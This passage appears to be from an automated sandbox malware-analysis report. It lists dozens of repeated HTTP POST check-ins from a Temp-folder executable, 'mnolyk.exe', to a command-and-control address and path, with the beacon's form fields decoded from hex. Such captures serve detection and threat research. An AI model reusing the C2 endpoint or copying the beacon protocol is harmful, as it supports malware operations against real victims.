                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.152475119 CET484INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      37192.168.2.74973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:10.568753004 CET141OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.632441998 CET141INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      370192.168.2.75006562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:42.321938038 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.387288094 CET485INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      371192.168.2.75006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:42.558660030 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.624227047 CET486INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      372192.168.2.75006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:42.809417963 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.874066114 CET487INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      373192.168.2.75006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:43.057009935 CET488OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.122375011 CET488INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      374192.168.2.75006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:43.290159941 CET489OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.354147911 CET489INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      375192.168.2.75007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:43.541726112 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.606462002 CET490INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      376192.168.2.75007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:43.808187962 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.872343063 CET491INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      377192.168.2.75007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:44.049737930 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.112437963 CET492INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      378192.168.2.75007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:44.306613922 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.371047020 CET493INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      379192.168.2.75007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:44.559818983 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.626315117 CET494INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      38192.168.2.74973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:10.829865932 CET142OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.893610001 CET142INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      380192.168.2.75007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:44.816817045 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.882617950 CET495INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      381192.168.2.75007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:45.054389000 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.116996050 CET496INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      382192.168.2.75007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:45.296740055 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.363030910 CET497INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      383192.168.2.75007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:45.546416044 CET498OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.609366894 CET498INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      384192.168.2.75007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:45.791596889 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.856878042 CET499INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      385192.168.2.75008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:46.056281090 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.123063087 CET500INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      386192.168.2.75008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:46.318732977 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.383594036 CET501INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
